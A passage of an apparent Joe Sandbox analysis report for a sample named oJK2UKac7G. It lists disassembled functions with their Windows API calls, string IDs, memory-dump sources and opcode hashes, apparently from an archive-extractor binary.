    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1542d9b8a4aaa7811e156133b505500a70d4b33521dc9fa22be5b5ce973ff5af
    • Instruction ID: 8e934939a9f2710c35df95496a0c35a50ea60ace247d56867d9fcda0e8fbe1fa
    • Opcode Fuzzy Hash: 1542d9b8a4aaa7811e156133b505500a70d4b33521dc9fa22be5b5ce973ff5af
    • Instruction Fuzzy Hash: 36A001962B92037C321862A2AD56E3B121CC4E6B6A330893EF41294891A8A0198621B6
    Function 00CAF6E5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 9418604b49353671808bdb80ec3465c3007472c49b546a8ce6d433bee9b777c4
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: 9418604b49353671808bdb80ec3465c3007472c49b546a8ce6d433bee9b777c4
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    Function 00CAF6BD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 00CAF69B
      • Part of subcall function 00CAF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CAFA4C
      • Part of subcall function 00CAF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CAFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 786211b0153e83a70b1a610a700f94796c9d4479f85ad1d344122d16c05ebfa9
    • Instruction ID: f609726842d025de496b342a4bb7e3c7e46b9d267b737320489ab6cd3f43783d
    • Opcode Fuzzy Hash: 786211b0153e83a70b1a610a700f94796c9d4479f85ad1d344122d16c05ebfa9
    • Instruction Fuzzy Hash: F5A001962B9103BC320866E2AD57E3B021CC4DAB6A330897EF403945D1A8A0184625B1
    Function 00C9A880 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
    Download Yara Rule
    APIs
    • CloseHandle.KERNEL32(000000FF,?,?,00C9A83D,?,?,?,?,?,00CC37FF,000000FF), ref: 00C9A89B
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: CloseHandle
    • String ID:
    • API String ID: 2962429428-0
    • Opcode ID: 4321cba5932bf3434c4f5c82800848ca4c291d4849b374a62d86e4847a12a213
    • Instruction ID: 22bd959f9c4e9d0c11b5e0134e34285f542e67777bc2b19a489d03d336a9d56e
    • Opcode Fuzzy Hash: 4321cba5932bf3434c4f5c82800848ca4c291d4849b374a62d86e4847a12a213
    • Instruction Fuzzy Hash: 1DF0E230082B01AFDF308A24C44C792B3F4AB12325F040F5ED0F3439E0D3606A8E8B81

    Non-executed Functions

    Function 00CAD410 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 233windowfileCOMMON
    Download Yara Rule
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00CAD4A1
    • EndDialog.USER32(?,00000006), ref: 00CAD4B4
    • GetDlgItem.USER32(?,0000006C), ref: 00CAD4D0
    • SetFocus.USER32(00000000), ref: 00CAD4D7
    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00CAD511
    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00CAD548
    • FindFirstFileW.KERNEL32(?,?), ref: 00CAD55E
      • Part of subcall function 00CABC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC2F
      • Part of subcall function 00CABC1B: SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CABC40
      • Part of subcall function 00CABC1B: SystemTimeToFileTime.KERNEL32(?,?), ref: 00CABC4E
      • Part of subcall function 00CABC1B: FileTimeToSystemTime.KERNEL32(?,?), ref: 00CABC5C
      • Part of subcall function 00CABC1B: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00CABC77
      • Part of subcall function 00CABC1B: GetTimeFormatW.KERNEL32(00000400,?,?,00000000,?,00000032), ref: 00CABC9E
      • Part of subcall function 00CABC1B: _swprintf.LIBCMT ref: 00CABCC4
    • _swprintf.LIBCMT ref: 00CAD5A7
      • Part of subcall function 00C94A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C94A33
    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00CAD5BA
    • FindClose.KERNEL32(00000000), ref: 00CAD5C1
    • _swprintf.LIBCMT ref: 00CAD610
    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00CAD623
    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00CAD640
    • _swprintf.LIBCMT ref: 00CAD673
    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00CAD686
    • _swprintf.LIBCMT ref: 00CAD6D0
    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00CAD6E3
      • Part of subcall function 00CAC083: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CAC0A9
      • Part of subcall function 00CAC083: GetNumberFormatW.KERNEL32(00000400,00000000,?,00CD072C,?,?), ref: 00CAC0F8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Item$Time$Text$_swprintf$FileSystem$FormatMessageSend$Find$CloseDateDialogFirstFocusInfoLocalLocaleNumberParentSpecificWindow__vswprintf_c_l
    • String ID: %s %s$REPLACEFILEDLG
    • API String ID: 2415798972-439456425
    • Opcode ID: 9042d60335bb4ae3663100f86707b62db7d69a46da1a4a3ae17b869808356f06
    • Instruction ID: 89d6c926b20fd9057876b9252141661aece6298472109f75a809f5089acb4385
    • Opcode Fuzzy Hash: 9042d60335bb4ae3663100f86707b62db7d69a46da1a4a3ae17b869808356f06
    • Instruction Fuzzy Hash: 1971B0725483057BE6319BA4DC89FFF7BACEB8A704F040819B75BD2481DA71AA049763
    Function 00C97AAF Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 337fileCOMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C97AB4
    • _wcslen.LIBCMT ref: 00C97B1D
    • _wcslen.LIBCMT ref: 00C97B8E
      • Part of subcall function 00C98704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C98713
      • Part of subcall function 00C98704: GetLastError.KERNEL32 ref: 00C98759
      • Part of subcall function 00C98704: CloseHandle.KERNEL32(?), ref: 00C98768
      • Part of subcall function 00C9B470: DeleteFileW.KERNEL32(?,00000000,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B481
      • Part of subcall function 00C9B470: DeleteFileW.KERNEL32(?,?,?,00000800,?,00C9A438,?,?,?,?,00C9892B,?,?,?,00CC37FF,000000FF), ref: 00C9B4AF
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00C97C43
    • CloseHandle.KERNEL32(00000000), ref: 00C97C5F
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00C97DAB
      • Part of subcall function 00C9B032: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00C97ED0,?,?,?,00000000), ref: 00C9B04C
      • Part of subcall function 00C9B032: SetFileTime.KERNEL32(?,?,?,?), ref: 00C9B100
      • Part of subcall function 00C9A880: CloseHandle.KERNEL32(000000FF,?,?,00C9A83D,?,?,?,?,?,00CC37FF,000000FF), ref: 00C9A89B
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,00000001,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B8FA
      • Part of subcall function 00C9B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C9B5B5,?,?,?,00C9B405,?,00000001,00000000,?,?), ref: 00C9B92B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
    • API String ID: 3983180755-3508440684
    • Opcode ID: f9f3df2748e98fa83608ebada037033168563126f4c575b83da3427ac9d14a4f
    • Instruction ID: 004cf7ae529e9c3bc9bbac92c78ad8262a92c3bed7901ea7613dca5f26036349
    • Opcode Fuzzy Hash: f9f3df2748e98fa83608ebada037033168563126f4c575b83da3427ac9d14a4f
    • Instruction Fuzzy Hash: 9BC1F471915249EEDF25DBA4CC49FEEB7ACAF04300F00466AF556E3282D730AE44DBA1
    Function 00CBEA9E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __floor_pentium4
    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
    • API String ID: 4168288129-2761157908
    • Opcode ID: 0189550aca83260453cfd96967c89335f6502ab0875fc44c1c671a3422ce2dc7
    • Instruction ID: 54b744b7b111518022b70f5e8d2d9efd477edd0de32574a52b3a7fc8957e2a50
    • Opcode Fuzzy Hash: 0189550aca83260453cfd96967c89335f6502ab0875fc44c1c671a3422ce2dc7
    • Instruction Fuzzy Hash: 96C22872E086288FDF25CE28DD407EAB7B9EB44305F1541EAD85DE7241E775AE828F40
    Function 00C9395A Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 666COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog_swprintf
    • String ID: CMT$h%u$hc%u
    • API String ID: 146138363-3282847064
    • Opcode ID: 839cfc909029eb162fd3b07e6b5efba922aa8f23cc458ea167710760b5d439df
    • Instruction ID: 935505a827f81f69d1855523c29121631f9984c3e9122cd1af59829f2b6cd9ab
    • Opcode Fuzzy Hash: 839cfc909029eb162fd3b07e6b5efba922aa8f23cc458ea167710760b5d439df
    • Instruction Fuzzy Hash: D942E9716012859FDF28DF74C899AE93BE5AF15300F04447DFC5ACB282DB70AA89DB61
    Function 00C92EB6 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 804COMMON
    Download Yara Rule
    APIs
    • __EH_prolog.LIBCMT ref: 00C92EBF
    • _strlen.LIBCMT ref: 00C9348B
      • Part of subcall function 00CA15F9: __EH_prolog.LIBCMT ref: 00CA15FE
      • Part of subcall function 00CA2EC2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00C9CF18,00000000,?,?), ref: 00CA2EDE
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C935DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
    • String ID: CMT
    • API String ID: 1206968400-2756464174
    • Opcode ID: 716c19aa63e6470b20e34196405b45f291b536bcdb3f5900a8d184e839cc47d0
    • Instruction ID: fee2383899509df331fa5b5f337338477ee9a93619412ff31895ae683276decd
    • Opcode Fuzzy Hash: 716c19aa63e6470b20e34196405b45f291b536bcdb3f5900a8d184e839cc47d0
    • Instruction Fuzzy Hash: 5C6225716002C48FDF29DF38C8996E93BA1AF55304F08457EFCAA9B282DB749B45CB51
    Function 00CB09FA Relevance: 6.1, APIs: 4, Instructions: 73COMMON
    Download Yara Rule
    APIs
    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CB0A06
    • IsDebuggerPresent.KERNEL32 ref: 00CB0AD2
    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CB0AF2
    • UnhandledExceptionFilter.KERNEL32(?), ref: 00CB0AFC
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
    • String ID:
    • API String ID: 254469556-0
    • Opcode ID: 04a06c6213f0c3663ddb8a76928b85194ef11169f68a462d834a8dcb723d8549
    • Instruction ID: 541c6976f1c69c9bc4525bed13ed725e35f1686876ba14825b97eae9e0105dd1
    • Opcode Fuzzy Hash: 04a06c6213f0c3663ddb8a76928b85194ef11169f68a462d834a8dcb723d8549
    • Instruction Fuzzy Hash: 63311675D4521C9BDF21DFA4D989BCDBBB8AF08304F1041AAE409AB251EB719A849F44
    Function 00CAF81F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • VirtualQuery.KERNEL32(80000000,00CAF764,0000001C,00CAF959,00000000,?,?,?,?,?,?,?,00CAF764,00000004,00CF3D24,00CAF9E9), ref: 00CAF830
    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CAF764,00000004,00CF3D24,00CAF9E9), ref: 00CAF84B
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: InfoQuerySystemVirtual
    • String ID: D
    • API String ID: 401686933-2746444292
    • Opcode ID: a397dea7e58769d1f816a2b0c86fd70326f65af409b154ba4808324e68c44321
    • Instruction ID: 92d54e6fec4df093e85612046cf162b83f186a98a5abbe72aaf536b75476199f
    • Opcode Fuzzy Hash: a397dea7e58769d1f816a2b0c86fd70326f65af409b154ba4808324e68c44321
    • Instruction Fuzzy Hash: C401AC726001096BDB18DE69DC05BDD7BE9AFD6368F0CC234ED59D7194D638D942C6C0
    Function 00CB4FDF Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00CB50D7
    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00CB50E1
    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00CB50EE
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled$DebuggerPresent
    • String ID:
    • API String ID: 3906539128-0
    • Opcode ID: d8ad797e54dd0923d4ea66f2be6b717660f682f8648355d8a1157ec995b79482
    • Instruction ID: 8141b0cbeacc0689e47798f9ace9a9a17985ce302ce1d7f3773bc1cde8c11b25
    • Opcode Fuzzy Hash: d8ad797e54dd0923d4ea66f2be6b717660f682f8648355d8a1157ec995b79482
    • Instruction Fuzzy Hash: DC31B2759012189BCB21DF68DC89BDDBBB8AF08310F5041DAE91CA7250EB709F818F44
    Function 00CBC4F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
    Download Yara Rule
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID: .
    • API String ID: 0-248832578
    • Opcode ID: 7637be0ef4a1d34c512e9183a4af2d0471a458ea0a0c7594f2daca13d63a683a
    • Instruction ID: 51ce76a10c1e56bfe922b9f03f0fce92f87fce61dae771654e8e7a5aabda3c1f
    • Opcode Fuzzy Hash: 7637be0ef4a1d34c512e9183a4af2d0471a458ea0a0c7594f2daca13d63a683a
    • Instruction Fuzzy Hash: 8531F472900249AFCB249E78CCC5EFF7BBDEB85314F1401A8F829D7251E630AE449B60
    Function 00CBE5F0 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction ID: 1b577b79a9613a9d3904bafcf4ea8c442171835a4bad8e048f296f904f52ef39
    • Opcode Fuzzy Hash: d08e2bcb8369247a90beecc4ac2937ecc20121a35f50d3dd5c946701bfc99d8e
    • Instruction Fuzzy Hash: A9020B71E002199BDF14CFA9C8806EDBBF5FF88714F258169D929E7284D731AE45CB90
    Function 00CAC083 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
    Download Yara Rule
    APIs
